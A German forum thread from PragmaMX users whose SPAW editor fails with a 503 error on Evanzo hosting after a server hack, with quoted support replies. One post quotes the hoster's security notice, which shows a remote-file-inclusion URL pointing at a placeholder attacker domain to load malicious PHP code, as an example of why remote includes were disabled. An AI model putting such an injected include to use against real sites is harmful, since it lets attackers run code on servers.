Suche

[tuxxi]

Hallo zusammen...

nachdem unser Server letzten Montag gehackt worden ist, musste ich einen kompletten Restore machen.

Es funktioniert auch alles wieder soweit, nur wenn ich einen Artikel erstellen möchte, und z.B. ein Bild einfüge, erscheint in einem PopUp nachfolgende Meldung:

******
Zugriff nicht möglich!

Der Server ist derzeit nicht in der Lage die Anfrage zu bearbeiten. Entweder ist der Server derzeit überlastet oder wegen Wartungsarbeiten nicht verfügbar. Bitte versuchen Sie es später wieder.

Sofern Sie dies für eine Fehlfunktion des Servers halten, informieren Sie bitte den Webmaster hierüber.
******

Das ganze ist Browserunabhängig und auch die einzelnen Dateirechte sind richtig gesetzt. Der Pfad in der conf ist ebenfalls korrekt.

Habe die Seite von meinem Testserver auf den Live-Server bei Evanzo hochkopiert, lokal funktioniert alles, nur eben nicht auf dem Live-Server. Das Spaw-Verzeichnis habe ich ebenfalls noch mal einzeln hochkopiert, keine Änderung.

Irgend jemand vielleicht ne Idee???

Schönen Dank und Gruß
Stephan

[Andi]

Hi

ist das noch aktuell?
Auf deiner Seite kann ich im /spaw/ Ordner alle Dateien ganz normal aufrufen...

[Oscar]

Blick es auch nich 


habe den code übernommen, kriege aber nur diese meldung!

Parse error: parse error, unexpected '.' in C:\Programme\xampp\htdocs\pragma\modules\editortest\index.php on line 34

könnte jemand eventuell eine kleine index zeigen. wie es richtig sein muß?

oder liegt es daran, das es im xampp liegt?

gruß
Oscar

[tuxxi]

hi andy,

sorry das ich jetzt erst antworte...

jepp, ist noch aktuell...  habe nicht dran gedacht, die richtige webseite anzugeben.. schande über mich..

http://www.smartfriends.de   

ich habe dort ein komplett neues pragmamx in einem anderen verzeichnis installiert, der gleiche fehler.

wenn ich eine url eingeben will, geht zwar das kleine popup auf, jedoch steht da eben der madige text drin.. von wegen server überlastung...

auf der seite von evanzo habe ich den hinweis gefunden, das die das aufrufen fremder seiteninhalte per php unterbunden haben.

denke, das wird wohl damit zusammenhängen...  datenbank habe ich auch schon alles neu eingerichtet, gleiches resultat...

vorallem funktioniert das ganze ja auf meinem eigenen rootserver einwandfrei  http://smaf.madserver.de

denke, ich werd unsere smartclub seite umziehen...  morgen nochmal bei evanzo anrufen und sehen, was die da machen können.

werde es dann hier auf jeden fall posten.

schönen gruß
stephan

[jubilee]

@Oscar:

habe den code übernommen, kriege aber nur diese meldung!
Parse error: parse error, unexpected '.' in C:\Programme\xampp\htdocs\pragma\modules\editortest\index.php on line 34
könnte jemand eventuell eine kleine index zeigen. wie es richtig sein muß?

Poste doch bitte die Zeilen 30-35 aus der
C:\Programme\xampp\htdocs\pragma\modules\editortest\index.php

[Okimen]

Hallo,
also nachdem ich einige freundliche Hinweise (Versionsüberwachung) bekommen habe, so kann ich seit einiger Zeit sagen, ich habe demnach eine funktionierende 0.1.9 Version auf meinem Server!

Wollte jetzt wiederholt einige neue Artikel schreiben, musste dann leider feststellen, das es weder möglich ist Bilder einzufügen, noch die Textfarbe zu ändern, oder so!

Bekomme dann immer nur folgende Fehlermeldung:

Zugriff nicht möglich!

Der Server ist derzeit nicht in der Lage die Anfrage zu bearbeiten. Entweder ist der Server derzeit überlastet oder wegen Wartungsarbeiten nicht verfügbar. Bitte versuchen Sie es später wieder.

Sofern Sie dies für eine Fehlfunktion des Servers halten, informieren Sie bitte den Webmaster hierüber.
Error 503
www.diweweb.de
Tue Feb 13 20:37:56 2007
Apache

Laut meinem Hoster (Evanzo) ist auf dem Server alles in Ordnung!

Hat jemend ne Idee woran es liegen könnte. Meine vorher ging es ja, habe auf meinem Server (www.diweweb.de) ja schon einige Artikel veröffentlicht, die soweit in Ordnung sind!

Falls notwendig, stelle ich dem PragmaMX Support Team natürlich auch gerne die Admin Daten per PM zur Verfügung!

MfG
Dirk

[Andi]

@ Oskar

Was hat das mit dem ursprünglichen Thema zu tun? 
http://www.pragmamx.org/Content-pa-showpage-pid-48.html#brule_6

Mach nen neuen Thread dazu auf

[Andi]

Moin

Stichwort Evanzo:
http://www.pragmamx.org/forum-topic-20286.0.html
gleiches Problem....

Laut meinem Hoster (Evanzo) ist auf dem Server alles in Ordnung!

Mit Sicherheit nicht

[Okimen]

Moin Andi,
vielen Dank.

Nur so richtig verstanden habe ich das nicht wirklich denke ich. Zumal ja vorher noch alles in Ordnung war!
Habe mich dort natürlich auch an das Support-Team gewendet, mit folgender Antwort bin ich dann abgespeist worden.

--------------------------------------------------------------------------------------------------------------
Sehr geehrter Herr Werner,
Vielen Dank fur Ihre Mail.
Unsere Technikabteilung hat Ihre Anfrage fuer Sie geprueft und der Fehler muesste eigentlich behoben sein.

Bitte pruefen Sie auch selber und wenn Sie weitere Fehler bemerken sollten bitte um eine kurtze Rückmeldung.

Für weitere Fragen steht Ihnen unser Supportteam immer gern zur Verfügung.
........................................................................
WICHTIG - Zuweisung des Supportpasswortes unter http://support.evanzo.net per Login in den persoenlichen Kundenbereich (Kunden-)Daten >> aendern.
.........................................................................
Mit freundlichen Gruessen
Ihre Support-Abteilung
Alexander Cusmaru
-----------------------------------------------------------------------

Also wohl nix mit günstigem Hoster, ist wohl noch zu teuer wenn die Leistung nicht stimmt!

LG
Dirk

[Andi]

Hi

da würde ich nochmal nachfragen. Wenn der Spaw vorher lief, und jetzt nicht mehr, dann liegt das nicht am Spaw. Solche Veränderungen können, egal was, nur von der Serverseite her kommen...

Tuxxi schreibt ja in seinem Post auch:

nachdem unser Server letzten Montag gehackt worden ist....
.....
auf der seite von evanzo habe ich den hinweis gefunden, das die das aufrufen fremder seiteninhalte per php unterbunden haben.

denke, das wird wohl damit zusammenhängen...

[tuxxi]

So, einige Telefonate mit Evanzo später bin ich noch genauso schlau :-)

Der Techniker will sich bei mir melden und ich habe auch auf den anderen Thread hingewiesen, wo ja augenscheinlich das gleiche Problem vorliegt.

Hoffe, ich erfahre bald genaueres... scheint aber wohl eine serverseitige Sache zu sein - hoffe, die haben da eine Lösung....

Gruß Stephan

[Okimen]

Hallo,
der vollständigkeit halber poste ich hier mal die Antwort von Evanzo!

########################################################################

Sehr geehrter Herr Werner,

Vielen Dank fur die ausfuehrliche Beschreibung Ihres Problems und fuer die Mitteilung der Zugangsdaten.

Wir haben Ihren Auftrag an die Technikabteilung zur Bearbeitung weitergeleitet.

Ihr Auftrag wird schnellstmöglich bearbeitet und Sie erhalten Informationen an die angegebene eMailadresse.

Für Rückfragen stehen wir Ihnen immer gerne zur Verfügung.
........................................................................
WICHTIG - Zuweisung des Supportpasswortes unter http://support.evanzo.net per Login in den persoenlichen Kundenbereich (Kunden-)Daten >> aendern.
.........................................................................
Mit freundlichen Gruessen
Ihre Support-Abteilung
Alexander Cusmaru

evanzo e-commerce GmbH - Postfach 544 - D-27498 Helgoland
Tel: 01805 013310* - Fax 01805 013311* (* 14 Cent/Min)

Kostenpflichtiger Telefonsupport Mo-Fr 10-18 Uhr 0900 - 580 59 203 (1,99 Euro/min)

Email support@evanzo.net - Web http://www.evanzo.net -

Geschaeftsfuehrer: Andreas Buis u. Stefan Pfeifer Eingetragen beim Amtsgericht Bremen  unter HRB 19591 Zuständiges Finanzamt Pinneberg
Steuernummer: DE211161668

evanzo ® ist beim Deutschen Patentamt als geschuetzte Marke eingetragen. Alle Rechte liegen bei der evanzo e-commerce GmbH


*****************************************************************
Fuer nicht im Tarif enthaltenen erweiterten Support empfehlen wir
               http://www.premiumsupport24.de
moderne Soforthilfe per  Internet auf  Ihrem PC vom Spezialisten
           Hilfe und Beratung fuer jedes Problem.
###########################################################################

LG
Dirk

[tuxxi]

so, bis jetzt nix neues.. habe einer netten dame am telefon genau erklärt und auf der seite gezeigt, wo es hapert...  nen techniker bekommt man anscheinend da nicht direkt ans telefon, ausser über ne 0900er leitung.. toll...

naja, nu wart ich mal, was die da machen, die nette dame war sehr zuversichtlich

auf jedenfall habe ich einfliessen lassen, das es nicht nur unsere seite betrifft, sondern alle, die pragmamx auf den servern von evanzo einsetzen...

vielleicht bringts ja was...  zumindest war die dame sehr freundlich 

sowie es was neues gibt, werd ich berichten..

gruß stephan

[anauko]

Tja, hier die Mitteilung von Evanzo im Kundenbereich:
2007-02-05 17:43:33:
Sicherheitshinweis: PHP Includes

Das Nachladen von PHP Code aus externen Seiten per http und ftp wurde deaktiviert.

Der Aufruf der URL
http://meinedomain.de/index.php?page=http://meinedomain.de/inhalt.php funktioniert nicht, aber
http://meinedomain.de/index.php?page=inhalt.php funktioniert.

Diese Änderung wurde nötig, da sich leider Angreifer genau diese Lücke zu nutze machen können, um den Server und/oder Ihre Webseite zu schädigen.
z.B. so:
http://meinedomain.de/index.php?page=http://angreiferdomain.de/schadcode.php


Wenn Sie aus bestimmten Gründen einen PHP Include von externem Code benötigen, schreiben Sie bitte an unseren Support.

Alles Klar!? Also an den Support schreiben oder den Provider wechseln oder.....
Frage gibt es eine andere Lösung diese Krux zu umgehen?

[Andi]

Hi

oki, die haben allow_urlfopen abgeschaltet...
Das ist richtig so, weil es in schrottigen Scripten eine grosse Sicherheitslücke darstellt.

Im pragmaMx wird aber nichts über solche URL's "nachgeladen". Auch nicht im Spaw. Damit hat es also direkt nichts zu tun.

Es gab in alten Versionen des (standallone) Spaw eine Lücke, die genau dieses problem ausnutzte. Vielleicht haben die Jungs noch zusätzlich was eingebaut, die den Spaw im pragmaMx blockiert....


PS:
Ich verbinde jetzt mal die beiden Threads.

[tuxxi]

so, etliche telefonate später wurde mir nun von den netten ma im callcenter wiederholt gesagt, die technik hätte das problem bereits glöst...

tja, bin dann mit dem ma zum wiederholten male auf der seite das problem durchgegangen und oh wunder..  es besteht immer noch...

naja, immerhin will er jetzt in der technik druck machen...

fazit, wenn die das weiterhin so handhaben, geht am montag die kündigung und nen kk hin...

gruß stephan

[Okimen]

Hallo Stephan,

kann ich gut nachvollziehen.
Bin zwar nicht grad der größte was den Umgang mit pragmaMX angeht, denke aber auf ein Super Support-Team bei PragmaMX und viele viele hilfsbereite und helfende User zurückgreifen zu können.
Aber was Evanzo angeht, da kommt man sich langsam wirklich verar... ähh verkohlt vor.
Werde mich deinem Entschluss wohl anschließen.

LG
Dirk

PS: Schönes Wochenende!!!

[tuxxi]

Hi Dirk..

jepp, sind da echte Helden...

Eben nach Hause gekommen und natürlich gleich geschaut, ob sich etwas getan hat...

ES HAT...  zumindest wenn ich die Seite mit dem Firefox öffne, kommt wieder das kleine Fenster, in dem man die Url etc. einfügen kann, bei IE nach wie vor die Fehlermeldung...

Email wie gewünscht ist auch noch keine gekommen...  werde also am Montag mal wieder zum Telefonhörer greifen...

Allen noch ein schönes WE
Stephan

[tuxxi]

tja, was immer die da auch machen.. wollte heute morgen nen artikel einstellen, wieder keine funktion, auf direkt eingegebener html-code (<a href="...) wird nicht angezeigt...

Fehlerseite wieder bei jedem Browser, auch beim Firefox...

[trulla]

Ich hab die gleichen Probleme! Vielleicht sollten wir uns zusamm tun und eine Petition einreichen